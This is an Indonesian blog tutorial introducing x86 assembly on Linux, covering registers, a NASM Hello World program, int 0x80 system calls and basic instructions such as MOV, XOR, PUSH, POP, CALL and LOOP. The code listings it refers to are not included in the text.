| EIP | Tidak bisa dipakai programmer, hanya dipakai prosesor untuk menunjukkan alamat memori yang berisi instruksi berikutnya yang akan dieksekusi. |
Perhatikan gambar di bawah ini untuk melihat register-register yang ada dalam prosesor keluarga IA32 (Intel Architecture 32 bit).
courtesy of iu-bremen.de
Dalam gambar di ats terlihat bahwa register-register Extended (berawalan E) adalah register 32 bit. Agar kompatibel program-program sebelumnya ketika register hanya ada 16 bit, maka register yang lain adalah bagian bit bawah dari versi extendednya. Contohnya adalah register ESI dan SI. Register SI adalah 16 bit paling bawah dari ESI. Pada register EAX, AX adalah 16 bit paling bawah dari EAX. Register AX pun dipecah lagi menjadi 8 bit atas AH dan 8 bit bawah AL. Programmer bebas menggunakan yang mana saja sesuai kebutuhannya.
The Classic “Hello World”
Cukup sudah berteori, kini kita mulai berbasah-basah. Mari kita buat program pertama dalam assembly yang menampilkan teks “Hello World”. Dalam artikel ini saya menggunakan format syntax Intel, bukan AT&T. Silakan ketik source berikut dan simpan dalam nama hello.asm
Setelah itu kita akan mengcompile file ASM itu menjadi object code berformat ELF dengan NASM (netwide assembler). Setelah itu akan terbentuk file hello.o yang harus dilink dengan linker LD agar menjadi format executable.
Selamat, anda telah berhasil membuat program Hello World dalam bahasa Assembly. Program di atas sangat sederhana, kita memanggil system call write() untuk menampilkan string (msg), kemudian kita memanggil system call exit() untuk keluar dari program dan program selesai. String msg kita taruh dalam section .data karena section tersebut khusus untuk menyimpan data/variabel. Sedangkan instruksi assembly disimpan dalam section .text karena section text khusus untuk menyimpan code.
Hello World Opcode
Untuk melihat keterkaitan antara assembly dan bahasa mesin kita bisa melihat opcode dari program assembly yagn kita buat dengan program objdump pada gambar berikut ini.
Opcode di sebelah kiri adalah versi bahasa mesin dari bahasa assembly di sebelah kanannya. Hal ini menunjukkan eratnya kaitan antara assembly dan bahasa mesin. Contohnya adalah instruksi assembly INT 0×80 diterjemahkan ke bahasa mesin: 0xCD 0×80 (dalam hexa) atau 11001101 (binary dari 0xCD) 10000000 (binary dari 0×80).
Perhatikan bahwa pada source code assembly, “MOV EDX, len” setelah dicompile diterjemahkan menjadi “MOV EDX, 0xE”. Hal ini karena len adalah konstanta berisi panjang string “Hello, World!” yaitu sepanjang 14 karakter. Instruksi assembly pada source code “MOV ECX, msg” setelah dicompile diterjemahkan menjadi “MOV ECX, 0x80490a4″. Mengapa msg diterjemahkan menjadi 0x80490a4? Hal ini karena msg adalah address dari string “Hello, World!” sehingga setelah dicompile diterjemahkan menjadi alamat 0x80490a4. Terlihat juga pada gambar di atas pada lokasi 0x80490a4 terdapat string “Hello, World!”.
System Call
Dalam program hello world di atas kita memanfaatkan system call untuk menampilkan teks di layar monitor. System call adalah gerbang menuju kernel mode bagi program yang membutuhkan servis yang hanya bisa dikerjakan oleh kernel.
System call di Linux dipanggil dengan menggunakan interrupt 80 hexa. Nomor system call dimasukkan dalam register EAX. Daftar lengkap nomor systemcall di Linux bisa dibaca di file header: /usr/include/asm/unistd.h. Berikut adalah cuplikan isi dari file unistd.h
Dalam contoh hello world kita memanfaatkan system call nomor 4 (write) dan nomor 1 (exit). Untuk mengetahui cara pemakaian dan argumen untuk system call tersebut, kita bisa gunakan man di Linux.
Dari manual system call write meminta 3 argument: yaitu file descriptor bertipe integer, alamat memori tempat string berada, dan terakhir adalah panjang string bertipe integer. Ketika argumen tersebut disimpan dalam register mulai dari EBX, ECX dan EDX. Argumen pertama di EBX, argumen kedua di ECX dan ketiga di EDX. Register EAX dipakai untuk menyimpan nomor system call. Dari manual system call exit meminta 1 argument: yaitu kode status bertipe integer yang disimpan dalam register EBX.
Dalam contoh hello world di atas kita menggunakan 3 intruksi assembly yaitu MOV, XOR dan INT. Mari kita bahas intstruksi tersebut.
Instruksi MOV
Kita menggunakan MOV untuk menyalin data dari sumber ke tujuan. Sumber dan tujuan bisa alamat memori, atau register. Perhatikan contoh berikut:
| NASM/Intel | AT&T | Deskripsi |
|---|---|---|
| MOV EAX, 0×51 | MOVL $0×51, %EAX | Mengisi register EAX dengan nilai 51 hexa |
| MOV ESP, EBP | MOVL EBP, ESP | Menyalin isi register EBP ke register ESP |
Perbedaan antara sintaks NASM dan AT&T adalah arah pengkopian. Dalam sintaks NASM, tujuan ada pada operand pertama, sedangkan dalam sintaks AT&T tujuan adalah operand ke-2.
Instruksi XOR
Instruksi XOR digunakan untuk melakukan operasi logika Xclusive OR. XOR akan menghasilkan 0 bila kedua operandnya sama, dan menghasilkan 1 bila tidak sama. XOR ini biasanya dipakai untuk membuat register menjadi 0 dengan melakukan XOR untuk operand yang sama seperti pada contoh hello world tersebut.
| NASM/Intel | AT&T | Deskripsi |
|---|---|---|
| XOR EBX,EAX | XOR %EAX,%EBX | XOR isi EBX dengan EAX, hasilnya disimpan di EBX |
Instruksi INT
Instruksi INT digunakan untuk mengirim sinyal interrupt ke prosesor. Dalam contoh di atas kita memakai interrupt nomor 80 hexa untuk meminta layanan dari kernel.
| NASM/Intel | AT&T | Deskripsi |
|---|---|---|
| INT 0×80 | INT $0×80 | Memanggil interrupt nomor 80 hexa |
Contoh Lain: Hello World X Times
Kali ini kita akan memodifikasi program hello world di atas agar bisa menampilkan pesan yang sama berkali-kali tergantung dari argumen yang dimasukkan user.
Simpan source code di atas dengan nama helloxtimes.asm, lalu compile dan link seperti di bawah ini.
Kita belajar beberapa instruksi baru dalam contoh ke-2 ini, yaitu looping, penggunaan argumen dan prosedur, sedangkan system call yang dipakai tetap sama, yaitu write() dan exit().
Program kali ini menerima argumen berupa integer 1-9 yang dipakai sebagai counter berapa kali pesan akan muncul di monitor. Argumen ini diambil dari stack dengan instruksi POP. Pada puncak stack ada argc, yaitu jumlah argumen ketika program dijalankan. Di bawahnya berisi address dari argv[0] yaitu nama program. Kemudian di bawahnya lagi baru berisi address dari argv[1] yaitu parameter/argumen pertama. Perhatikan pada baris ke-6 s/d baris ke-8 ada instruksi POP EAX sebanyak tiga kali. Ini dilakukan karena yang diperlukan ada pada posisi ke-3 sehingga kita harus membuang 2 elemen di puncak sebelum bisa mengambil address argv[1]. Address argumen ke-1 diambil dari POP lalu disimpan dalam register EAX. Karena bentuknya masih string, maka harus diubah dulu menjadi integer dengan memanggil prosedur stringtoint pada baris ke-9.
Instruksi POP untuk Mengambil Argumen
Ketika program dijalankan dengan satu argumen seperti “./helloxtimes 7″. Maka jumlah argumen (argc) akan berisi 2, yaitu nama program itu sendiri, dan satu argumennya. ARGC akan disimpan pada puncak stack, dan elemen di bawahnya berisi alamat memori dari nama program, dan dibawahnya lagi berisi alamat memori dari argumen pertama. Perhatikan gambar di atas yang menunjukkan proses pengambilan alamat memori berisi string argumen pertama dari stack. Dalam contoh tersebut argumen adalah string “7″, yaitu karakter berkode ASCII 37 hexa diikuti dengan ASCII 0 (karakter NULL). Alamat memori berisi string argumen pertama itu diambil dari stack dan disimpan di register EAX.
Pada prosedur stringtoint, register EAX berisi address string yang akan diubah menjadi integer. Kita hanya mengambil karakter pertama saja, pada baris ke-35 dengan instruksi MOV, isi memori pada address yang ditunjuk oleh EAX dicopy ke register BL.
“MOV EBX, [EAX]” berbeda dengan “MOV EBX,EAX”. MOV EBX,[EAX] berarti menyalin isi memori pada alamat yang disimpan di EAX ke dalam register EBX. Sedangkan MOV EBX,EAX berarti menyalin isi register EAX ke register EBX
Saya menggunakan register BL karena kode ASCII lebarnya hanya 8 bit. Bila benar berisi angka, maka register BL akan berisi nilai 30h-39h (kode ascii untuk “0″-”9″). Setelah itu register BL dikurangi dengan 30h untuk mendapatkan nilai dari 0-9. Setelah itu hasilnya ditambahkan ke register ECX sehingga kembali dari prosedur ini dengan nilai integer hasil konversi di register ECX.
Setelah mendapatkan nilai argumen bertipe integer di register ECX, selanjutnya ECX ini perlu diselamatkan dulu dalam stack (baris 12) sebab ECX akan dipakai dalam prosedur _print_hello (baris 13). ECX dipakai sebagai alamat string msg ketika memanggil system call write(). Setelah kembali dari prosedur _print_hello, nilai ECX perlu dikembalikan seperti semula dengan POP ECX (baris 14) sebab akan dipakai sebagai counter dalam LOOP (baris 15). Ketika menjalankan instruksi LOOP, register ECX akan dikurangi 1, kemudian bila ECX > 0 maka program akan lompat ke _print. Bila ECX bernilai 0, maka loop berhenti dan menjalankan system call exit(0).
Setelah memahami cara kerja program contoh ke-2 itu. Sekarang mari kita bahas instruksi baru yang ada di sana: CALL, RET, PUSH, POP, LOOP.
Instruksi PUSH dan POP
Instruksi PUSH digunakan untuk menyimpan nilai ke dalam stack. Kebalikannya adalah instruksi POP untuk mengambil nilai dari stack. Stack dalam Linux membesar ke alamat memori yang lebih rendah. Puncak stack ada di alamat rendah, sedangkan dasar stack ada di alamat yang lebih tinggi.
| NASM/Intel | AT&T | Deskripsi |
|---|---|---|
| PUSH value | PUSHL value | Menyimpan nilai ke dalam stack |
| POP dest | POPL dest | Mengambil nilai dari stack ke dest |
Struktur Data Stack
Stack adalah struktur data yang mirip seperti tumpukan piring. Data yang diambil dari stack adalah data yang dimasukkan terakhir, atau istilahnya adalah LIFO (last in first out). Jadi kalau kita ingin mengambil data di tengah-tengah tumpukan, caranya adalah dengan mengambil dulu data dari puncak sampai habis, sehingga data yang kita inginkan berada di puncak stack.
PUSH dan POP dalam Stack
Reguster ESP menunjukkan alamat memori dari puncak stack. Setiap ada instruksi PUSH, maka register ESP berkurang (ingat stack bertumbuh ke alamat yang makin mengecil) karena puncak stack berubah. Begitu pula bila sebaliknya bila ada instruksi POP, maka register ESP akan bertambah.
PUSH EAX di atas sama dengan dua instruksi di bawah ini:
PUSH EAX (4 byte) bisa dilakukan dengan mengurangkan ESP dengan 4, kemudian menyalin isi EAX ke memori di lokasi SS:[ESP], yaitu di segment stack pada offset yang ditunjuk oleh ESP. DWORD PTR menunjukkan bahwa lebar data yang akan disalin ke memori dalam instruksi MOV itu selebar 4 byte.
POP EAX di atas sama dengan dua instruksi di bawah ini:
POP EAX (4 byte) bisa dilakukan dengan menyalin isi memori di lokasi SS:[ESP], yaitu di segment stack pada offset yang ditunjuk oleh ESP ke register EAX, lalu menambahkan ESP dengan 4. DWORD PTR menunjukkan bahwa lebar data yang akan disalin ke memori dalam instruksi MOV itu selebar 4 byte.
Instruksi CALL dan RET
Instruksi CALL digunakan untuk memanggil sebuah prosedur. Sedangkan RET dipakai untuk kembali dari prosedur kembali ke lokasi setelah instruksi pemanggilan. Ketika instruksi CALL dijalankan, prosesor menyimpan alamat instruksi sesudah instruksi CALL ke dalam stack (return address), kemudian prosesor lompat ke alamat subroutine yang dituju. Ketika instruksi RET dijalankan, maka prosesor mengambil (POP) return address (alamat yang di-push ketika CALL), kemudian loncat ke alamat tersebut.
| NASM/Intel | AT&T | Deskripsi |
|---|---|---|
| CALL subroutine1 | CALL subroutine1 | Memanggil prosedur subroutine1 |
| RET | RET | Kembali dari prosedur |
Instruksi LOOP
LOOP digunakan untuk melakukan looping sejumlah nilai yang ada pada register ECX. Ketika ada instruksi LOOP, prosesor akan mengurangi nilai ECX dengan 1, kemudian membandingkan hasilnya. Bila nilai ECX sekarang masih > 0, maka prosesor akan loncat ke alamat yang ditunjuk dalam LOOP. Bila nilai ECX sekarang menjadi 0, prosesor tidak akan loncat, tapi melanjutkan mengerjakan instruksi selanjutnya setelah LOOP.
| NASM/Intel | AT&T | Deskripsi |
|---|---|---|
| LOOP address | LOOP address | Looping ke alamat yang ditunjukkan oleh address bila ECX > 0. |
Instruksi tunggal “LOOP address” ekivalen dengan 2 instruksi assembly berikut:
Pada gambar di atas ada dua kondisi yang mungkin yaitu ECX > 0 atau ECX = 0. Mungkin ada yang bertanya, lho bagaimana dengan kondisi ECX < 0 ? Ingat komputer hanya mengenal 2 simbol, yaitu 0 dan 1, jadi pada dasarnya tidak ada “-1″ atau “-0″ dalam representasi binary. Bilangan negatif direpresntasikan dengan pengkodean two-complement, silakan baca di signed number representation karena itu diluar topik yang kita bahas sekarang.
Bila ECX bernilai 0 sebelum mengerjakan instruksi LOOP, maka yang terjadi adalah program akan looping sebanyak 0xFFFFFFFF atau 4.294.967.295 kali. Hal ini terjadi karena 0 – 1 = -1 yang dalam binary adalah 0xFFFFFFFF dengan sistem two-complement.
oz3
xp remo club
Banner Exchange
Untuk Anda yang mau tukar Link silahkan copas script ini,,saya akan memasang banner anda di blog ini
Harga Blog Liyan oz
